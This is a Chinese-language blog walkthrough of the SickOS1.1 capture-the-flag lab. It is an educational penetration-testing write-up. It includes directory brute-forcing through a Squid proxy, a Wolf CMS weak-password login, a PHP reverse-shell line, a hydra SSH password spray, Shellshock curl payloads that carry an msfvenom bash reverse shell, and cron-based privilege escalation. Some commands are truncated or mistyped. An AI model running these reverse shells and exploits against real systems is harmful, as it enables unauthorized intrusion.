SickOS1.1 - 穿越Squid代理的CMS渗透

「红队笔记」靶机精讲:SickOS1.1 - 穿越Squid代理的CMS渗透

端口扫描

  1. 主机发现
  2. 快速扫描开放端口
  3. 扫描端口版本、系统版本
  4. UDP扫描、脚本扫描
    3128 squid-http

方法1

下一步思路

一是了解squid怎么用
二是对3128进行目录爆破
sudo dirb http://10.10.10.19:3128/
sudo gobuster dir -u [url] -w usr/share/seclists/Discovery/web-Content/raft-large-directories.txt (-x html,php)指定扩展名
这里使用的字典要安装feroxbuster
dirsearch

代理

发现应用代理、WAF可能阻挡了扫描。现在试下用3128作代理会发生什么
sudo dirb http://10.10.10.19 -p http://10.10.10.19:3128
(其实背后不一定是80端口)
配置浏览器代理为3128之后访问被扫描到的url

敏感信息

robot文件发现wolfcms关键词,搜索wolfcms admin path
尝试弱密码登录,搜索wolfcms default admin password

php木马

搜索php reverse shell one-liner
端口选择可能通过防火墙的
‘’’php
& /dev/tcp/10.10.10.3/443 0>&1'");?>
‘’’
sudo nc -lvnp 443建立监听

预渗透?

提取/etc/passwd中的用户名到users.txt
cat /etc/passwd | awk -F’:’ ‘{print $1}’ > users.txt
以上代码覆盖输出users.txt
用hydra测试哪个用户的密码是john@123
hydra -L users.txt -p ‘john@123’ ssh://目标IP
弹幕:多账户的ssh登录尝试使用crackmapexec

方法2

nikto扫描

sudo nikto -h 10.10.10.19 -useproxy http://10.10.10.19:3128
发现shellshock漏洞(别名shelldoor),在bash4.1前很有用
目录为/cgi-bin/status
测试shellshock漏洞
sudo curl -v --proxy http://10.10.10.19:3128 http://10.10.10.19/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"
-v: 显示更多信息

msfvenom构造bash反射式shell

构造payload:
sudo msfvenom -p cmd/nuix/reverse_bash lhost=10.10.10.3 lport=443 -f raw

  • cmd/unix目录下
  • lhost:目标ip
  • lport:目标端口
  • reverse_bash,反向bash连接
    0<&144-;exec 144<>/dev/tcp/10.10.10.3/443;sh <&144 >&144 2>&144
    有时payload用的sh会报错,因为没配置路径,先试试,根据结果再考虑改为/bin/sh
    开启监听
    sudo nc -lvnp 443
    利用shellshock漏洞,将上面生成的payload放在这里
    sudo curl -v --proxy http://10.10.10.19:3128 http://10.10.10.19/cgi-bin/status -H "Referer:() { test;}; "0<&144-;exec 144<>/dev/tcp/10.10.10.3/443;/bin/sh <&144 >&144 2>&144
    获得shell后了解主机信息
    whoami
    uname -a
    dpkg -l
    有安装python的话,通过以下命令获得交互性更好的shell
    python -c "import pty;pty.spawn('/bin/bash')"
    sudo -l但不知道密码

    提权信息收集

    1
    2
    3
    4
    5
    ls
    cd /var
    ls -liah
    cd /etc
    ls -liah cron* # 居然可以用通配符

    msfvenom构造python反射式shell

    sudo msfvenom -p cmd/nuix/reverse_python lhost=10.10.10.3 lport=444 -f raw
    开启监听!
    vi盲操作
    按o新起一行,粘贴,esc,冒号wq

反思

被root定时执行的脚本一定不能让普通用户组修改

技术备忘 > 网络安全
#技术 #干货 #渗透
SickOS1.1 - 穿越Squid代理的CMS渗透
https://blog.zhaosn.top/2025/SickOS1.1_doublesolu/
作者
Zhao SN
发布于
2025年10月26日
更新于
2025年10月26日
许可协议